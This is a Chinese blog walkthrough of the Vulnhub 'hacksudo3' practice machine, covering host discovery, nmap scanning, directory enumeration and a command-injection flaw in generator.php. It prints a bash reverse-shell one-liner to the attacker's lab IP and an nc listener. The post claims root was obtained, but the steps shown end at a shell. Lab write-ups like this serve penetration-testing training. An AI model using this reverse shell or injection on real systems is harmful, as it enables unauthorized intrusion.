带你玩转渗透测试靶场Vulnhub——hacksudo3

已于 2024-04-22 15:13:09 修改
阅读量291 收藏
点赞数 2
分类专栏: Vulnhub靶场 文章标签: 安全 web安全 网络安全
于 2023-04-24 15:30:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74025111/article/details/130336032
版权

靶机获取:因本人网盘内存满了无法上传靶场各位可以在文章末尾添加我的v来获取靶场

一.搭建环境靶机

攻击机kali  IP地址:192.168.1.101

靶机IP地址:192.168.1.108

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段即可)

靶机环境搭建步骤

1.将下载好的hacksudo3导入VirtualBox

2.将网卡设置成和kali攻击机同一网段即可

二.实战

1.网络发现

netdiscover -i eth0 -r 192.168.1.0/24(指定网卡扫描)

2.查看靶机开放端口

使用nmap -A -sV -T4 -p- 靶机IP 查看靶机开放端口

根据以上信息可得知开放了80端口

21和22端口的状态均为filtered

3.枚举漏洞

访问80端口分析数据,查看源码

源码没有问题,先扫一下目录

从目录里面发现/hidden/  我们先去访问一下http://192.168.1.108/hidden,由此发现好像是一个解密的

继续访问下一个,http://192.168.1.108/decrypt/ 发现这个也是一个解密的网站

访问:http://192.168.1.108/bruteforce/这也是一个解密用的网站

我们先来访问默认的登录页面:http://192.168.1.108/login.php 竟然发现了这个网页的登录页面

 刚才目录里还扫描到了info.php,我们现在来访问一下看看里面有什么可用的资源

访问:192.168.1.108/generator.php发现了一个smart登录口随便输一个字符进去,看一下是否存在命令注入漏洞

提交ls -la 以上的命令都可以执行的话,证明是存在命令注入漏洞的

2.漏洞利用

生成一个反向的shell

`bash -c "bash -i >& /dev/tcp/192.168.1.101/6666 0>&1"`

KALI开启本地监听:nc -lvp 6666

然后成功拿到shell

总结:本靶机是通过命令注入漏洞进行渗透,获取root权限

老杨网络之路.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来说,Google 可以提供很大的帮助,但您可以随时发推文@DCAU7 寻求帮助,以帮助您重新开始。但请注意:我不会给你答案,相反,我会给你一个如何继续前进的想法。
Vulnhub靶机:hacksudo-Thor
qq_48904485的博客
02-09 878
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:hacksudo-Thor(10.0.2.49)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hacksudo/hacksudo—Thor.zip。
vulnhub靶场之Thales
qq_58091216的博客
02-04 943
我们看到了两个txt文件,模式里面提示我们,一个flag在user.txt,一个在root.txt里面,那么我们进行查看user.txt文件,但是需要thales权限,我们查看notes.txt文件,notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh。一般情况下,我们首先去home目录下查看,然后在去/var/www/html/目录下查看有没有什么线索,我们看到了thales命令,我们进行查看。我们在thales目录下发现了隐藏的.ssh文件,我们进行查看。
billu-b0x靶场渗透
11-14
billu-b0x靶场渗透
靶机练习 No.24 Vulnhub靶机hackable-ii ftp匿名访问+上传马+网页运行 反弹shell sudo python3.5提权
YouthBelief的博客
02-16 2685
靶机练习 No.24 Vulnhub靶机hackableII0x00 环境安装0x01 信息收集步骤一:ip探测步骤二:端口服务识别0x02 漏洞挖掘思路一:ftp 匿名访问思路二:80 http服务挖掘思路三:ssh爆破步骤一:ftp匿名访问(成功)(1) 匿名登录(2)查看内容步骤二:80http探测(1)访问首页(2)查看源码 有没有隐藏信息(3)目录扫描(4)查看files页面步骤三:ftp上传马(1)查看ftp是否拥有写权限(2)上传 kali自的php反弹shell的马(3)kali开启监听,
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2342
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 6580
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 6677
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1345
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
vulnhub靶场-Nagini
qq_42947816的博客
11-01 1766
Nagini 是 HarryPotter VM 系列的第二个 VM,您需要在其中找到隐藏在机器内的 3 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 5374
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
渗透测试模拟实战——暴力破解、留定时任务后门与shift粘贴键后门、植入WaKuang程序(对应靶场和wakuang样本)
03-24
渗透测试模拟实战——暴力破解、留定时任务后门与shift粘贴键后门、植入WaKuang程序(靶机系统:Windows2008)对应的靶场和wakuang样本,参考教程链接:...
VulnHub20230718最新全部靶场详情 - 共701个靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
渗透测试靶场,模拟搭建渗透测试真实环境,搭建靶场详细流程即相关包.zip
12-05
内容:详细的渗透测试靶场搭建包,以及详细搭建流程,提供了靶场所有环境,比如sql注入,木马,获权等模拟真实环境 适用于:需要学习渗透测试相关知识,但是没有搭建好模拟真实环境的靶场人群下载以及使用,同时针对...
全视通智慧手术室对讲方案,让手术更安全更高效
2301_78035670的博客
04-24 452
全视通智慧手术室对讲方案通过整合等候区公告屏、医护主机、手术间门口机、复苏室主机等多个模块和设备,专用于手术室、护士站、谈话间、复苏室、器械室和其他协同部门,实现了对手术流程的全面管理和监控。
安装SSL证书之后还会有不安全提示怎么办?
JoySSL230907的博客
04-20 824
在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。- 证书链完整性:确保您不仅安装了主证书,还包含了所有必要的中间证书。缺少中间证书可能导致浏览器认为证书不可信。- 清除浏览器缓存:浏览器可能缓存了旧的或错误的证书信息,清除缓存有助于加载新安装的证书。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。
跨境电商测评攻略:如何安全有效地提升业绩?
zcwz888的博客
04-23 343
但自养号需要解决技术层面的问题,如果是买设备或者软件这种,可能上一秒还能用,下一秒就因为平台风控的原因批量封号,因为平台会通过ip 获取到设备的型号,地区码,监管码,主板码,WIFI地址,甚至是颜色,指纹码,IP地址等等大概几十个参数,参数关联后,触发平台机审,导致的砍单,封号。这时候要好好规划一下测评的事情,做美客多到最后你会发现,测评是最有效果的,因为测评的本质就是玩弄流量,模仿用户的真实行为让流量变得更多,从而得到跨境电商平台规则的加成,竞争激烈的产品不测评和别人竞争。
网络安全实训Day16
最新发布
Yisitelz的博客
04-26 288
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
web渗透测试靶场cms
09-06
你可以尝试一些知名的Web渗透测试靶场CMS,如DVWA(Damn Vulnerable Web Application)、OWASP Juice Shop和WebGoat。这些靶场CMS都是为了帮助安全专业人员和开发者学习和实践Web渗透测试技术而设计的,它们提供了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值